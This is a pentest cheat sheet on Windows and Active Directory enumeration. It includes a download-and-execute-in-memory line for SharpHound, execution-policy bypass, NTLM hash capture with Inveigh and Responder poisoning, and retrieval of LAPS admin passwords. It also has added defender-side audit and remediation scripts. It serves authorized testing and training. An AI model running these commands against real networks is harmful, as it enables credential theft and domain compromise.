# Enumeration

## 1. Local machine enumeration

Windows Sysinternals

[Sysinternals Suite - Windows Sysinternals | Microsoft Docs](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)

```powershell
Get-ComputerInfo
```

* Download scripts directly into memory

{% code overflow="wrap" %}

```powershell
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1'))
```

{% endcode %}

* Check whether a machine is missing security patches

```powershell
HOSTNAME.EXE
```

```powershell
Get-WmiObject -Class win32_OperatingSystem | select version,buildnumber
```

```powershell
wmic qfe list full | findstr /i hotfix
```

On <https://patchchecker.com/> you can look up, by Windows build number, which vulnerabilities affect the machine because of missing updates; that information can be used for privilege escalation.

## 2. Domain enumeration

Bypassing PowerShell execution policies

```powershell
powershell.exe -executionpolicy bypass
powershell.exe -ep bypass
Set-ExecutionPolicy Unrestricted
```

* [Seatbelt](https://github.com/GhostPack/Seatbelt)
* [ADRecon](https://github.com/sense-of-security/ADRecon/blob/master/ADRecon.ps1)

```powershell
. .\ADRecon.ps1 
```

* [PowerView tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
* View the DC machine

```powershell
get-netcomputer
```

* List domain users

```powershell
Get-DomainUser | select -ExpandProperty cn 
```

* List domain computers

```powershell
Get-DomainComputer
```

* List the domains in the forest

```powershell
Get-ForestDomain 
```

* List the trust types of the domains/forest

```powershell
Get-DomainTrust 
```

```powershell
Get-ForestTrust 
```

* Information about a domain group

```powershell
Get-DomainGroup "Domain Admins" 
```

* List the members of a domain group

```powershell
Get-DomainGroupMember "Domain Admins" | select -ExpandProperty membername
```

* List domain shares, excluding the default shares, and check access

```powershell
Find-DomainShare -ExcludeStandard -ExcludePrint -ExcludeIPC -CheckShareAccess 
```

* List the computers in the Servers OU

{% code overflow="wrap" %}

```powershell
Get-DomainOU -name Servers | %{ Get-DomainComputer -SearchBase $_.distinguishedname } | select dnshostname 
```

{% endcode %}

* List the password policy

```powershell
(Get-DomainPolicy)."SystemAccess" 
```

* Users with SID History (PowerView)

```powershell
Get-DomainUser -LDAPFilter '(sidHistory=*)' 
```

* List the domain shares the current user has access to

```powershell
Find-DomainShare -CheckShareAccess 
```

* Check the BitLocker configuration

```powershell
manage-bde.exe -status 
```

* [Capture NTLM hashes with Inveigh](https://github.com/Kevin-Robertson/Inveigh)

```powershell
Invoke-Inveigh -HTTP N -NBNS Y -ConsoleOutput Y -EvadeRG Y 
```

### LAPS

* Resource: <https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/laps>

```powershell
Install-Module -Name AdmPwd.PS
```

* Check whether LAPS is installed on the machine

{% code overflow="wrap" %}

```powershell
REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul 
```

{% endcode %}

```powershell
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll' 
```

* Identify whether it is installed on the DC

```powershell
Get-ChildItem 'C:\Program Files\LAPS\CSE\Admpwd.dll'
```

```powershell
Get-ChildItem 'C:\Program Files (x86)\LAPS\CSE\Admpwd.dll'
```

* List the ms-mcs-admpwd attribute

```powershell
Get-NetComputer | Select-Object 'name','ms-mcs-admpwd' 
```

```powershell
Get-DomainComputer -identity <Hostname> -properties ms-Mcs-AdmPwd
```

{% code overflow="wrap" %}

```powershell
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'
```

{% endcode %}

* List the users or groups with read permission on the LAPS property for a specific computer

{% code overflow="wrap" %}

```powershell
Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData | Select-Object -ExpandProperty distinguishedname | ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object {Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_} | Where-Object {($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {Convert-NameToSid $_.IdentityReference} | Select-Object -ExpandProperty SID | Get-ADObject
```

{% endcode %}

* List the ACL for every OU where some user has read permission on the LAPS attribute

{% code overflow="wrap" %}

```powershell
Get-NetOU | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; $_}
```

{% endcode %}
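The same LAPS read-rights audit as above, written as an added defender-side example with only the RSAT ActiveDirectory module (this is not code from the original page or from PowerView). It resolves the schema GUID of `ms-Mcs-AdmPwd` and walks every OU's ACL, which is how an administrator verifies that only the intended helpdesk/admin groups can read local admin passwords. The function name is my own; it assumes the `AD:` PSDrive that the module creates.

```powershell
Import-Module ActiveDirectory

function Get-LapsReadRights {
    # ACEs reference attributes by schema GUID, so resolve the GUID of ms-Mcs-AdmPwd first.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
    if (-not $attr) { throw 'ms-Mcs-AdmPwd is not in the schema: legacy LAPS has not been deployed.' }
    $lapsGuid = [guid]$attr.schemaIDGUID

    foreach ($ou in Get-ADOrganizationalUnit -Filter *) {
        $acl = Get-Acl -Path ("AD:\" + $ou.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # An empty ObjectType means the ACE covers every attribute / every extended right.
            $targetsAttr = ($ace.ObjectType -eq $lapsGuid) -or ($ace.ObjectType -eq [guid]::Empty)
            # ms-Mcs-AdmPwd is a confidential attribute: reading it needs CONTROL_ACCESS
            # (ExtendedRight) or GenericAll, not ReadProperty alone, so report all three.
            $canRead = $ace.ActiveDirectoryRights -match 'ReadProperty|ExtendedRight|GenericAll'
            if ($targetsAttr -and $canRead) {
                [pscustomobject]@{
                    OU        = $ou.DistinguishedName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.ActiveDirectoryRights.ToString()
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Review the output and remove any principal that is not an approved admin or helpdesk group.
Get-LapsReadRights | Sort-Object OU, Principal | Format-Table -AutoSize
```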

Network poisoning

Once connected to the infrastructure's network, [Responder](https://github.com/lgandx/Responder) can be used to spoof the LLMNR and NBT-NS services, since they are transmitted over UDP.

```bash
responder -I <InterfazDeRed> 
responder -I <InterfazDeRed> -Prdwv 
```
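As an added defender-side example (not part of the original page): a PowerShell check of whether a Windows host still answers LLMNR and NBT-NS, the services Responder and Inveigh spoof, together with the registry remediation. The registry locations are the documented policy and NetBT settings; the function names are my own.

```powershell
function Get-NamePoisoningExposure {
    # LLMNR is controlled by the DNSClient policy value EnableMulticast: 0 disables it.
    # If the value is absent, Windows keeps LLMNR enabled by default.
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
    $llmnrEnabled = ($null -eq $llmnr) -or ($llmnr -ne 0)

    # NBT-NS is per interface: NetbiosOptions 2 = disabled, 0 = from DHCP (usually on), 1 = enabled.
    $ifaceKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    $nbtInterfaces = foreach ($iface in Get-ChildItem -Path $ifaceKey) {
        $opt = (Get-ItemProperty -Path $iface.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions
        if ($opt -ne 2) { $iface.PSChildName }
    }

    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        LLMNREnabled      = $llmnrEnabled
        NetBIOSInterfaces = @($nbtInterfaces)
        Exposed           = $llmnrEnabled -or (@($nbtInterfaces).Count -gt 0)
    }
}

function Disable-NamePoisoningServices {
    # Remediation: the same values the GPO "Turn off multicast name resolution" and the
    # adapter's "Disable NetBIOS over TCP/IP" setting write. Needs an elevated shell.
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    if (-not (Test-Path $llmnrKey)) { New-Item -Path $llmnrKey -Force | Out-Null }
    Set-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 -Type DWord
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' |
        ForEach-Object { Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Value 2 -Type DWord }
}

Get-NamePoisoningExposure
```

Run `Disable-NamePoisoningServices` only after confirming nothing on the segment relies on NetBIOS name resolution; the change takes effect on the next adapter restart.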

### BloodHound

It is the go-to tool for enumerating a domain.

For that reason, a dedicated [*section*](https://github.com/securiters/SecuritersWiki/blob/main/Herramientas_BloodHound.md) has been created for the tool.

